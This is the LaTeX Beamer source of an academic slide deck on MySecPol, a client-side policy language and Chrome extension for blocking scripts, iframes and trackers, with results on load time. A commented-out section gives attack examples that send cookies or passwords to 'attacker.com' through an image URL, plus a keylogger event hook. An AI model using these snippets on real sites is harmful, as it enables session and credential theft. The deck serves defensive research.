\documentclass{beamer}
\usepackage[utf8]{inputenc}
\usepackage{setspace}
\usepackage{graphics}
\usepackage{graphicx}
\usepackage{multirow}
\usepackage{relsize}
\usepackage{float}
\usepackage{listings}
\usepackage{color}
\usepackage{epigraph}
%\usepackage{cite}
\usepackage{natbib}
\usepackage{xcolor}
\lstset{ % General setup for the package
	numberstyle=\tiny,
    basicstyle=\small\sffamily,
	frame=tb,
	tabsize=4,
	columns=fixed,
	showstringspaces=false,
	showtabs=false,
	keepspaces,
	commentstyle=\color{red},
	keywordstyle=\color{blue}
}
\usepackage{verbatim}
\usetheme{Berlin}
%\usepackage{tikz}
\usecolortheme{spruce}
\usepackage[linesnumbered,ruled,vlined]{algorithm2e}
\usepackage{algorithmic}
\usepackage{algpseudocode}
%\usebackgroundtemplate{
%\begin{tikzpicture}[remember picture,overlay]
%\node[opacity=0.01,anchor=south east,yshift=20pt] at (current page.south east) {\includegraphics[scale=.25]{./figures/logo.png}};
%\end{tikzpicture}
%}

\AtBeginSection[]{
  \begin{frame}
  \vfill
  \centering
  \begin{beamercolorbox}[sep=8pt,center,shadow=true,rounded=true]{title}
    \usebeamerfont{title}\insertsectionhead\par%
  \end{beamercolorbox}
  \vfill
  \end{frame}
}



\title{Towards an Architecture for \\ Safe and Secure Browsing}
\author{Maj Amit Pathania \\ (163054001) \\  }
\institute{ Indian Institute of Technology Bombay}
\date{\today}

\begin{document}
\begin{frame}
\titlepage
\end{frame}

\begin{frame}{Table of Contents}
    \tableofcontents
\end{frame}

\section{Introduction}
\begin{frame}{Introduction}
\begin{itemize}
     \item Web browsers handle content from different sources making them prone to various attacks. 
    
     \item A simple architecture for defining client side policies using {\tt MySecPol}, proposed policy specification language. These access control policies capture the security requirements of the user.
     
      \item The client side policies give the user control to decide the content being served to him. User can define these policies independent of the browser or OS. 
      \item  These policies are then realized in the browser as an extension. The client side policies can  capture the essence of existing security mechanisms and combine them to provide more robust protection.

\end{itemize}
\end{frame}

\section{Motivation}

\begin{frame}{Motivation}
\begin{itemize}
\item Existing \textbf{server side protection} involves web developers to rewrite code by restricting the use of vulnerable JavaScript functions or add additional security headers in HTTP responses from server. 
\item The \textbf{client-side protection }mechanisms include enabling browser security and privacy settings or use of browser extensions for protection against common attacks. 
\item The client has to either rely on either web developers for privacy and security  or download different browser extensions for protection against different attacks.  
\item Policy based architecture provides \textbf{user controlled browser enforced security mechanism} for safe browsing and provides level of security as desired by the user.

\end{itemize}

\end{frame}

\begin{comment}
\section{Background}
\begin{frame}{Browser Architecture}
\begin{itemize}
    \item \textbf{The user interface}. Includes the address bar, menu, back/forward button, bookmarking menu,home button etc.
    \item \textbf{The browser engine}. Helps in communication between the UI and the rendering engine.
    \item \textbf{The rendering engine}.Used for parsing the html content, building DOM tree, rendering the web page and painting the content on display screen for users.
    \item \textbf{Networking}.Responsible for making HTTP requests and receiving responses.
     \item \textbf{UI backend}. Used for drawing basic widgets like combo boxes and windows and uses underlying OS user interface methods.
     \item \textbf{JavaScript interpreter}. Used to parse and execute JS code.
     \item \textbf{Data storage}. This is a persistence layer to save data locally, like cookies, browser history, bookmarks etc. 
\end{itemize}
\end{frame}

\begin{frame}{Browser Architecture}
\begin {figure} [H]
\centering
\includegraphics [scale=0.4] {./figures/browsercomponents.png}
\caption { Browser Components \cite{browserwork}}
\end {figure}
\end{frame}




\begin{frame}{Browser Rendering process}

\begin {figure} [H]
\centering
\includegraphics [scale=0.35] {./figures/rendering.png}
\caption { Browser Rendering process \cite{chrome_rendering}}
\end {figure}

\end{frame}


\section{Security risks in web browsers}
\begin{frame}{Privacy violating flows}
\begin{itemize}
     \item \textbf{Cookie Stealing}. The malicious script embedded in the page can steal the cookie between user and website by adding document.cookie to the URL of image and triggering an HTTP request to the attacker's server. 
     (img.src="attacker.com/evil.png"+document.cookie)

     \item \textbf{Sensitive Data Theft Attacks}. An attacker can use embedded malicious code to send user sensitive data information to attacker's webserver by adding this sensitive data information to URL of the image.
     img.src="attacker.com/evil.png"+user\_password+accountnumber

     \item  \textbf{History Sniffing}. These attacks rely on the fact that browsers display links to sites that has been visited differently than ones those haven’t. History sniffing JavaScript code checks to see if user's browser displays links to specific URLs as {\color{blue}blue} or {\color{purple}purple}.
\end{itemize}

\end{frame}

\begin{frame}{Privacy violating flows}
\begin{itemize}
     \item \textbf{Keylogging Attacks}. Attacker can use embedded scripts to log keystrokes by using event handlers. The listener function can be used to record user's keystrokes and these logs can be sent through an HTTP request to attacker's server. 
     document.onkeypress = listenerfunction ;
     \item \textbf{Behavior Tracking}. The embedded scripts can use event handlers that track mouse and keyboard activity to record information about the user's mouse clicks and movements, scrolling behavior, and what parts of the text were highlighted on the webpage. 
     \item  \textbf{Reading page contents}. Third party scripts can read contents of the page. Such actions are common for scripts used for ad-retargetting purpose\cite{Scriptinspector}. Based on user's shopping or search history, the relevant ads are served to the user. 
\end{itemize}

\end{frame}

\begin{frame}{Other security vulnerabilities}
\begin{itemize}
     \item \textbf{Unintended page modifications}. The website developers mark certain sections in page (using tags like adPos) where ads can be inserted. However, malicious third party scripts may misuse their privileges and can inject ads in unintended places by modifying the DOM elements. 
     \item \textbf{Web-based Malware}. An evil website can try to automatically install a malware binary in victim's computer. The installed malware often enables an adversary to gain remote control over the compromised computer system and can be used to steal sensitive information\cite{webmalware}. Malvertisements \cite{Malvertisement} use  malicious banner ads to install malware on victim machines.
  
\end{itemize}

\end{frame}
\end{comment}

\section{Our Approach Via {\tt MySecPol}}\label{approach}

\begin{frame}{Key Idea : Policy prerequisites}
\begin{itemize}
\item The client side policy \textit{should be simple} and must not require special skill or expertise. 
\item The policy \textit{should be non-conflicting} and should be able to resolve conflicts in case of either dependent or conflicting rules. 
\item The policy \textit{should be implementable} in current Web context without browser modifications. Current web standards should support the defined policies.
%and all current popular browsers should provide APIs to implement these policies.
\end{itemize}
\end{frame}


\begin{frame}{Proposed Architecture}
 \begin {figure} [h]
\centering
\includegraphics [scale=0.3] {./figures/architecture.png}
\caption {Proposed architecture for secure browsing }
\label{fig:architecture}
\end {figure}
\end{frame}



\begin{frame}{Syntax of client side policy}
 \begin {figure} [h]
\centering
\includegraphics [scale=0.22] {./figures/policyspec.png}
%\caption {Syntax of client side policy}
\label{fig:syntax}
\end {figure}
\end{frame}




\begin{frame}[fragile]{Policy interpretation}
Let P\textsubscript{U} be user defined policy which contains set of rules R s.t. rules R\textsubscript{1}, R\textsubscript{2}, ... R\textsubscript{n} $\in$ R. Let P\textsubscript{E} be the policy implemented by the browser containing set of rules R$'$ s.t. rules R$'$\textsubscript{1}, R$'$\textsubscript{2}, ... R$'$\textsubscript{n} $\in$ R$'$.
\begin{itemize}
\item \textbf{Property 1}: All rules defined by user in his policy  P\textsubscript{U} will be included in effective policy  P\textsubscript{E} if these rules are disjoint with each other. Two rules R\textsubscript{i} and R\textsubscript{j} are said to be disjoint if they are independent to each other and are non-contradicting.  
\begin{lstlisting}[caption={},captionpos=b]
Rule1: deny javascript www.xyz.com
Rule2: deny	image	   www.abc.com
Rule3: deny javascript www.abc.com
\end{lstlisting}
\end{itemize}
\end{frame}

\begin{frame}[fragile]{Policy interpretation}
Let P\textsubscript{U} be user defined policy which contains set of rules R s.t. rules R\textsubscript{1}, R\textsubscript{2}, ... R\textsubscript{n} $\in$ R. Let P\textsubscript{E} be the policy implemented by the browser containing set of rules R$'$ s.t. rules R$'$\textsubscript{1}, R$'$\textsubscript{2}, ... R$'$\textsubscript{n} $\in$ R$'$.
\begin{itemize}
\item \textbf{Property 2}: If there are two rules such that one rule(R\textsubscript{j}) is a subset of the other rule (R\textsubscript{i}), then  only rule (R\textsubscript{i}) will be included in the effective policy P\textsubscript{E}. 
\begin{lstlisting}[caption={},captionpos=b]
Rule1: deny javascript *
Rule2: deny	javascript	www.abc.com
\end{lstlisting}
\item \textbf{Property 3}: If two rules for a resource or domain are either dependent or conflict with each other, then the stricter of the two will be taken in the effective policy P\textsubscript{E} ignoring the other.
\begin{lstlisting}[caption={},captionpos=b]
Rule1: deny javascript *
Rule2: allow javascript www.abc.com
\end{lstlisting}

\end{itemize}
\end{frame}





\section{Security Policies}
\begin{frame}[fragile]{Blacklisting scripts}\label{pol:blacklistscripts}
Websites also include tracking, advertising and analytic scripts for revenue generation or tracking user behavior. We can define policy that either blocks scripts from any specific domains or block all domains or only cross-origin domains. 

\begin{lstlisting}
    deny    javascript  *://*.google-analytics.com/*
    deny    javascript  *://*.zedo.com/*
    deny    javascript  *
    deny    javascript  crossdomain
\end{lstlisting}
  
\end{frame}


\begin{frame}[fragile]{Selective resources} \label{pol:selresources}
An user can specify policies for various HTTP request for resources like image, flash objects, stylesheets, and so on. 

\begin{lstlisting}
    deny    object          *
    allow   image           *://giphy.com/*
    deny    stylesheet      *://evil.com/*
    deny    media           *
    deny    XMLhttprequest  *
    deny    iframe          *
\end{lstlisting}
\end{frame}

\begin{frame}[fragile]{Creating blacklist and whitelist}\label{pol:createblacklist}
User may desire to either block access to certain untrusted websites by creating blacklist or allow access to only few web sites by creating whitelist.
\begin{lstlisting}
    deny    access  *://*.evil.com/*
    deny    access  *://*.tracker.com/*
\end{lstlisting}
\begin{lstlisting}
    deny    access  *-
    allow   access  *://*.iitb.ac.in/*
    allow   access  *://*.abc.com/*
\end{lstlisting}
\end{frame}

\begin{frame}[fragile]{Setting browser's privacy settings}\label{privacyPolicy}
Users' privacy can be protected by configuring various browser features like auto-fill option for web forms, password saving for different websites, third-party cookies, webRTC traffic handling, safe browsing mechanisms and doNotTrack header for HTTP requests. A sample privacy protection policy is given below.
\begin{lstlisting}
    deny    thirdpartycookies       *
    deny    autofill                *
    allow   safeBrowsingEnabled     *
    deny    passwordSavingEnabled   *
    allow   doNotTrackEnabled       *
    deny    webRTC                  *
\end{lstlisting}
\end{frame}

\begin{frame}[fragile]{Misc Policies}\label{misc}
\begin{itemize}
\item Remove cookie information from cross-origin requests.
\item Block non-HTTPS connections.
\item Block all application or executable file downloads.
\item Limit the number of opened tabs.
\item Blocking User-Agent or referer  headers.
\item Restrict cookie type to `HttpOnly' cookies.
\item Create whitelist for cross-origin requests.
\item Implementing Content Security Policy \cite{csp} at browser.
\end{itemize}
\end{frame}

\begin{frame}[fragile]{CSP at browser}\label{pol:csp}

\begin{lstlisting}
deny	object		*			  *://abc.com/*
allow   image       www.hdimg.com *://abc.com/*
allow	javascript	www.xyz.com	  *://abc.com/*
deny	iframe	    *			  *://abc.com/*
\end{lstlisting}
Above policy is equivalent to following headers sent by `*://abc.com/*' :-
\begin{lstlisting}
Content-Security-Policy: default-src 'self';
                         object-src 'none';
                         img-src www.hdimg.com;
                         script-src www.xyz.com ;
X-Frame-Options: DENY
\end{lstlisting}
  
\end{frame}



\section{Implementation Details}\label{implementation}
\begin{frame}{Implementation Details}
\begin{itemize}
\item Based on the policy defined by the user in MySecPol language, the parser will set browser extension parameters. 
\item We have used chrome.webRequest \cite{webrequest} and chrome.privacy APIs \cite{privacyAPI} in our prototype extension.
\item The chrome.privacy API is used to control user's privacy settings in chrome and the chrome.webRequest API is used to intercept, block, or modify HTTP requests and responses.
\end{itemize}
\end{frame}



\begin{frame}[fragile]{Parser}
\begin{center}
\scalebox{0.48}{
\begin{algorithm}[H]
 \caption{Parser implementation}
  \label{algo:parser} 
\SetAlgoLined
%\SetKwInOut{Input}{Input}\SetKwInOut{Output}{Output}
%\Input{User defined policy \em P\textsubscript{U} \em containing set of rules \em R\em.}
%\Output{Effective policy \em P\textsubscript{E} \em containing flag\textsubscript{f}, whitelist WL\textsubscript{f} and blacklist BL\textsubscript{f} for each field `f'.}\\
F = Set of fields (as defined in MySecPol) \\
Initialize variables for each field \\
\For{each rule $R$ in policy $P\textsubscript{U}$:} {
\If {$R$.field $\in$ F } {
f = $R$.field \\
flag\textsubscript{f} = true\\
\If {$R$.action == `allow' } {
WL\textsubscript{f}.add(R.dstn-domain) \\
}
\If {$R$.action == `deny' } {
BL\textsubscript{f}.add(R.dstn-domain) \\

}

}
}
//Resolve conflicts in user defined policy\\
\For{each field $i$ in $F$:} {
\If {`*' $\in$ BL\textsubscript{i} and $WL\textsubscript{i}$ != NULL } {
 WL\textsubscript{i} = NULL\\
}
\If {`*' $\in$ WL\textsubscript{i} and $BL\textsubscript{i}$ != NULL  } {
 WL\textsubscript{i}.remove(*)\\
}
\If {`domain' $\in$ BL\textsubscript{i} and `domain' $\in$ WL\textsubscript{i} } {
 WL\textsubscript{i}.remove(`domain')\\
}
}
Write variable values to the browser extension 
\end{algorithm}
}
    
\end{center}
\end{frame} 

\begin{frame}[fragile]{Policy implementation}
\begin{center}

\scalebox{0.7}{
\begin{algorithm}[H]
\SetAlgoLined
\SetKwInOut{Input}{Input}\SetKwInOut{Output}{Output}
\Input{HTTP request or HTTP response}
\Output{Allow or deny input}
%\KwResult{Write here the result }
 %initialization\;
 \For{each HTTP request / HTTP response}{
  %instructions\;
  \eIf{Policy flag set for Resource}{
   Get domain of request / response\;
   \If{Domain in whitelist}{
   	Allow request / response \;
   	} 
    \If{Domain in blacklist}{
    Block or modify request/ response \;}
   
   }{
   Allow request / response\;
  }
 }
 \caption{Policy check by prototype extension }
 \label{algo:policycheck}
\end{algorithm}
}
    
\end{center}
\end{frame}

\section{Experimental evaluation}\label{experimentation}
\begin{frame}{Soundness}
\begin{itemize}
\item Tested  prototype for different rules  followed by various combinations of these rules for a complete solution. 
\item Monitored the HTTP requests sent, responses received and the content served by the browser in absence and presence of certain rules in the policy. 
\item Logged the violations of rules reported by the extension and analyzed the logs manually for verification. 
\item The effectiveness by design, since it intercepts and inspects all incoming and outgoing HTTP requests for possible violations against the policy. 
\end{itemize}
\end{frame}

\begin{frame}{Performance}
\begin{itemize}
\item Additional checks for each outgoing requests and received responses adds overhead.
\item  Performance overhead in terms of page load time after policy implementation. 
\item Used an open source Google Chrome extension called `Performance-Analyser' \cite{perfanalyzer} to measure load time performance overhead. 
\item Measured load times and other parameters of Alexa Top websites with and without our prototype extension for different policies.
\end{itemize}
\end{frame}

\begin{frame}[fragile]{Performance: Policy to block all cross-origin scripts}
\begin{table}
\centering
\scalebox{.7}{
  \begin{tabular}{ |c|p{1cm}|p{1cm}|p{1.5cm}|p{1cm}|p{1cm}|p{1cm}|p{1cm}| }
    \hline
\multirow{2}{1cm}{Domain} & \multicolumn{3}{c|}{\textbf{Load time}(in ms)} & \multicolumn{2}{c|}{\textbf{Total requests}} & \multicolumn{2}{c|}{\textbf{JS requests}}\\    
\cline{2-8}
    &   without extension & with extension & \% increase &  without extension & with extension &   without extension & with extension  \\
    \hline

google.com & 312 & 384.5 &23.24&19 & 14& 6 & 2 \\ \hline
youtube.com & 5285&1875 &-64.52& 67 & 28 &10&0 \\ \hline
facebook.com & 2798 & 1334&-52.32& 313 & 14 &102 & 0  \\ \hline
baidu.com & 159 & 599 & 276.73&18&6&7 &0\\ \hline
wikipedia.org & 387& 398.5&2.84& 6&5&2&2 \\ \hline
reddit.com & 679.5&1432&110.74& 68&31 &15 &0\\ \hline
yahoo.com & 3479 &1003&-71.16& 150 &31 & 82 & 0\\ \hline
qq.com & 5861.1 & 1510&-74.24 & 150 & 114 & 26 & 6\\ \hline
google.co.in& 354&376&6.21 & 18 & 12 & 5 &2\\ \hline
taobao.com & 2744.5 &2800&02.02& 112 & 12 & 29 & 0\\ \hline
  \end{tabular}
}
  \caption {Performance with cross origin scripts blocked}
  \label{table:cross-domain}
\end{table}
\vspace*{-\baselineskip}
Note: Increase in average load time for websites due to additional checks but it decreased for the websites where third-party scripts were more, thus reducing the total requests and fetched content.
\end{frame}

\begin{frame}[fragile]{Performance: Policy to block all executable downloads}
\begin{table}[h]
\centering\begin{tabular}{c|c}
\% increase in load time & \% of websites \\ \hline
less than 10\% & 50\% \\
10\% -50\% & 31\% \\
50\% -90\% & 8\% \\
more than 90\% & 11\% \\
\end{tabular}
\caption {Performance with policy to block all executable downloads}
\label{tabel:blockdownload}
\end{table}
\vspace*{-\baselineskip}

Note: Average increase of 30\% in load time with this policy as each response was monitored. However, this overhead was less than 10\% for fifty percent of websites.
\end{frame}

\begin{frame}[fragile]{Performance: Policy to block all iframes}
\begin{table}
\centering
\scalebox{.7}{
\begin{tabular}{ |c|p{1.5cm}|p{1.5cm}|p{1.5cm}|p{1.5cm}|p{1.5cm}| }
    \hline
\multirow{2}{1cm}{Domain} & \multicolumn{3}{c|}{\textbf{Load time }(in ms)} & \multicolumn{2}{c|}{\textbf{Total requests}} \\    
\cline{2-6}
    &   without extension & with extension & \% increase &  without extension & with extension  \\
    \hline

google.com & 312 & 336&7.69 & 19 & 19\\ \hline
youtube.com & 5285&4200&-20.5 & 67 & 56  \\ \hline
facebook.com & 2798 & 3884&38.81 & 313 & 244  \\ \hline
baidu.com & 159 & 538&238.3& 18&17\\ \hline
wikipedia.org & 387& 395&2.06& 6&5\\ \hline
reddit.com & 679.5&1663&144.6 & 68&62 \\ \hline
yahoo.com & 3479 &1859&-46.56& 150 &150 \\ \hline
qq.com & 5861 & 6052 &3.25& 150 & 150 \\ \hline
google.co.in& 354&377&6.49 & 18 & 16 \\ \hline
taobao.com & 2744.5 &2365&-13.81& 112 & 105 \\ \hline
  \end{tabular}
}
  \caption {Performance with policy to block iframes}
  \label{table:iframe}
\end{table}
\vspace*{-\baselineskip}
Note: Increase of 26.96\% in average page load time. Increase was less than 10\% for most websites. Decrease in load time of the websites which contain iframes for embedded content like videos.
\end{frame}

\begin{frame}{Compatibility}
\begin{itemize}
\item Defined in terms of loss of functionality and ease of usage for the given website.
\item  More restrictive policy means more loss of interactive features of the websites. 
\item Manual verification was done to check any loss of functionality.
\end{itemize}
\end{frame}

\begin{frame}{Compatibility: Policy to block all cross-origin JavaScripts}
\begin{itemize}
\item No degradation of useful web content displayed for sites which use cross-domain scripts for ads and analytics. 
\item Complete loss of functionality for a few websites like youtube.com, facebook.com and reddit.com. 
\item Reason: Scripts loaded on these websites are from different domains (\url{https://static.xx.fbcdn.net} for \url{facebook.com}, \url{https://s.ytimg.com/} for \url{youtube.com} and \url{https://www.redditstatic.com/} for \url{reddit.com}). 
\item Solution: Able to retrieve most of the functionality on these websites by whitelisting these scripts manually. 
\end{itemize}
\end{frame}

\begin{frame}{Compatibility: Policy to block all iframes}
\begin{itemize}
\item The loss of functionality was either not found or was very limited.

\item Few websites which use iframes to display site content faced the significant degradation of services.
 
\item Solution: We can modify `x-frame-options' response header to allow iframes from SAMEORIGIN or from whitelisted domains.
\end{itemize}
\end{frame}


\begin{frame}{Compatibility}
\begin{itemize}
\item No loss of functionality with {\color{blue}
policy to block executable downloads}.

\item No significant loss of interactivity for most of the websites when we  {\color{blue}blacklisted common advertising and analytic domains} except for those websites which deny their content when the domains were blocked.
 
\item Some websites which require third-party cookies to be enabled give error when we  {\color{blue}disable third party cookies} by our policy. 
\end{itemize}
\end{frame}



\section{Related work}

\begin{frame}{JavaScript Subsets and Rewriting}

\begin{table}[H]
\centering
\scalebox{.75}{
\begin{tabular}{|p{3cm}|p{7cm}|p{4cm}|}
\hline
 Work & Brief explanation & Drawback  \\\hline
\textit{evalinsandbox()} \cite{evalinsandbox} & Sandboxing mechanism  to run code using \textit{eval()} with reduced privileges. The principal for code running in the sandbox is defined in the constructor and properties available to code running in the sandbox are also specified& \multirow{4}{4cm}{Dependent on web developers for security and privacy. \\ Vulnerability due to bad coding practices, use of unsafe JavaScript functions, lack of input sanitization and unrestricted access to third party scripts.} \\
    \cline{1-2}
ECMAScript 5 strict mode \cite{ECMAstrict} & Standardized subset and restricted variant of JavaScript. Invoked by statement \textit{`use strict'}  & \\ \cline{1-2}
Caja Compiler \cite{caja}& Makes third party content safe to embed in the website & \\ \cline{1-2}
 ADsafe\cite{adsafe} & Subset of JavaScript that restricts the third-party code from doing any malicious activity & \\ \hline
  \end{tabular}}
\end{table}

\end{frame}

\begin{frame}{Browser Modifications}

\begin{table}[H]
\centering
\scalebox{.75}{
\begin{tabular}{|p{3cm}|p{7cm}|p{4cm}|}
\hline
 Work & Brief explanation & Drawback  \\\hline
ScriptInspector \cite{Scriptinspector} & Modified Firefox browser capable of intercepting and recording sensitive API calls from third-party scripts to critical resources. It records accesses that violate the policy for a given domain. & \multirow{2}{4cm}{Dependent on web developers for defining security policies. } \\
    \cline{1-2}
ConScript \cite{conscript} & Introduces a new attribute `policy' to the HTML $<$script$>$ tag that can store a policy defined by the web developer.  & \\ \hline
FlowFox \cite{flowfox2} & Modified Firefox browser that  implements information flow control for scripts by assigning labels. Uses Secure Multi Execution \cite{SME}. & \multirow{2}{4cm}{No widespread implementation due to browser modifications. User can't define security policies.}\\ \cline{1-2}
Virtual Browser \cite{virtualbrowser} & Virtualized browser which runs JavaScripts in a sandboxed environment to visualize their interaction with sensitive data in controlled environment. & \\ \hline
  \end{tabular}}
\end{table}
\end{frame}

\begin{frame}{Browser Extensions}

\begin{table}[H]
\centering
\scalebox{.75}{
\begin{tabular}{|p{3cm}|p{7cm}|p{4cm}|}
\hline
 Work & Brief explanation & Drawback  \\\hline
Noscripts \cite{noscript} & Provides anti-XSS and anti-Clickjacking protection using white-listing mechanisms. NoScript blocks all JavaScript, Java, Flash Silverlight and other executable contents by default. & Protect against XSS attacks. No flexibility.  \\
    \hline
Ghostery \cite{ghostry} & Detects and blocks tracking technologies on the websites user visit. & \multirow{2}{4cm}{Protection against tracking only. User can't define security policies.} \\\cline{1-2}
Abine \cite{abine} & Controls third-party services which exist on the current page. & \\ \hline
CsFire \cite{Csfire} & Strips authorization information from cross-origin HTTP requests, except for expected requests to mitigate CSRF attacks. Uses either client defined policy or server supplied policy. & Can't handle genuine cross origin requests in absence of server or user supplied whitelist. Protects against CSRF and clickjacking attacks only.\\ \hline
  \end{tabular}}
\end{table}
\end{frame}

\begin{frame}{Other related work}

\begin{table}[H]
\centering
\scalebox{.75}{
\begin{tabular}{|p{3cm}|p{7cm}|p{4cm}|}
\hline
 Work & Brief explanation & Drawback  \\\hline
Cross-Origin Request Policy (CORP) \cite{CORP} & Enables a server to control cross-origin requests by policy defined by a web developer. Policy is sent as additional HTTP response header. & Protect against CSRF and clickjacking attacks only.  \\
    \hline
Browser Enforced Authenticity Protection \cite{BEEP} & Modifies HTTP headers by stripping authorization information from all cross-origin requests after checking referrer header & Protection against clickjacking attacks. User can't define security policies. \\\hline
Allowed Referrer Lists (ARLs) \cite{ARL} & Browser security policy restricts the browser from sending ambient authority credentials with HTTP requests. The sites can specify whitelist of allowed referrer URLs, to which browsers can send authorization state. & No widespread implementation due to changes required. Protect against CSRF and  clickjacking only. \\\hline
  \end{tabular}}
\end{table}
\end{frame}

\section{Demonstration}
\begin{comment}
\begin{frame}
\begin{center}
\Huge  Demonstration 
\end{center}
\end{frame}
\end{comment}



\section{Conclusion}
\begin{frame}{Conclusion}
\begin{itemize}
\item {\tt MySecPol} is independent of platform/browser so easy to port policies from one browser to other, easy to understand and intuitive to write and can integrate several existing policies. 
\item Implemented it as a browser extension for Google Chrome browser on Windows 10 and Ubuntu 16.04. Other browsers also provide similar APIs.
\item The experimental results show that our solution provides effective security with low-to-moderate overhead for a spectrum of users/user applications. 
\item {\tt MySecPol}  provides flexibility to import existing ad-hoc solutions against clickjacking, CSRF, phishing, etc., by adding new fields or keywords. 
\item A paper has been submitted to \textbf{ACASC(Annual Computer Security Applications Conference)} 2018.
\end{itemize}
\end{frame}


        
 \section{References}
 \begin{frame}[allowframebreaks]
 \frametitle{References}
\bibliographystyle{unsrt}  
\bibliography{Bibliography}
\end{frame}

\section{}
\begin{frame}
\begin{center}
\Huge Thank You!
\end{center}
\end{frame}
\begin{frame}{Same Origin Policy(SOP)}
\begin{itemize}
\item Content received from one website is allowed to read and modify other content received from the same site but is not allowed to access content received from other sites.
 \item Scripts contained in a first web page can access data in a second web page, but only if both web pages have the \textit{same origin}.
\item Malicious script on one page is prevented from obtaining access to sensitive data on another web page through that page's Document Object Model.
\item Strict SOP disallow third-party images and style sheets to be loaded making browser very dull \cite{bettersecurity}.
\item Vulnerable to XSS attacks.
\end{itemize}
\end{frame}

\begin{frame}{ HTML5 PostMessages for cross domain messaging}
\begin{itemize}
     \item This method is used to pass data between two different domains (Cross domain communication). 
     \item The pages can send messages with code\cite{mozilla2}:
  newWindow.postMessage(message, target); 
     \item  Receiver window can listen for dispatched messages by executing event listener function and after verifying event.origin can read event.message.
     \item \textbf{Vulnerabilities}: Use of the wildcard domain “*” as \textit{target} or if sender's identity is not verified using the \textit{event.origin} and the \textit{event.data} is inserted into HTML DOM without proper validation.
\end{itemize}

\end{frame}

\begin{frame}{ Cross-Origin Resource Sharing (CORS)}
\begin{itemize}
     \item Cross-origin HTTP request is made by webpage when it requests a resource (image,CSS stylesheets,scripts) from different domain.
     \item Since XMLHttpRequest or Fetch can only make HTTP requests to its own domain as per SOP for resources, HTML5 CORS permits a developer to set up an access control list to allow other domains to access resources \cite{mozilla} .
     \item This can be controlled through the following headers: Access-Control-Allow-Origin, Access-Control-Allow-Credentials, Access-Control-Allow-Methods
\end{itemize}

     \textbf{Vulnerabilities}:Use of regular expressions or wildcard domain “*” to check whether given domain is permitted .


\end{frame}

\begin{frame}{ Content Security Policy(CSP)}
\begin{itemize}
     \item The CSP provides http header that allows websites to declare approved sources of content that browser is allowed to load in that page. This helps to reduce XSS risks on modern browsers\cite{csp}.
     \item Helps to create a whitelist of sources of trusted content, and browser can execute or render resources from these sources only.
     \item  If CSP is defined as \textit{Content-Security-Policy: default-src 'self'; media-src * ; script-src trustedcode.com} then videos can be loaded from any domain(*) and scripts can be executed from domain trustedcode.com.
     \item \textbf{Vulnerabilities}: Setting permitted source as wild card (*) for scripts or images.
\end{itemize}

\end{frame}

\begin{frame}{Type of XSS attacks}
\begin{itemize}
\item \textbf{Persistent XSS} \cite{XSS} involves an attacker injecting a script into a web application that stores user-supplied data into a server-side data store. Web site will then inserts the data into dynamically assembled pages delivered to all users. The example of such an attack involves a message board or web forum or comment field.
\item \textbf{Reflected XSS}. The malicious string is part of the victim's request to the website.The attacker frames the victim to make a request to the server which containing malicious code which gets reflected and executed inside the browser.
\item \textbf{DOM based XSS}\cite{excessXSS}. The malicious string is not actually parsed by the victim's browser until the website's legitimate JavaScript is executed. The malicious script is inserted as part of innerHTML and executed at client side itself.
\end{itemize}
\end{frame}
\end{document}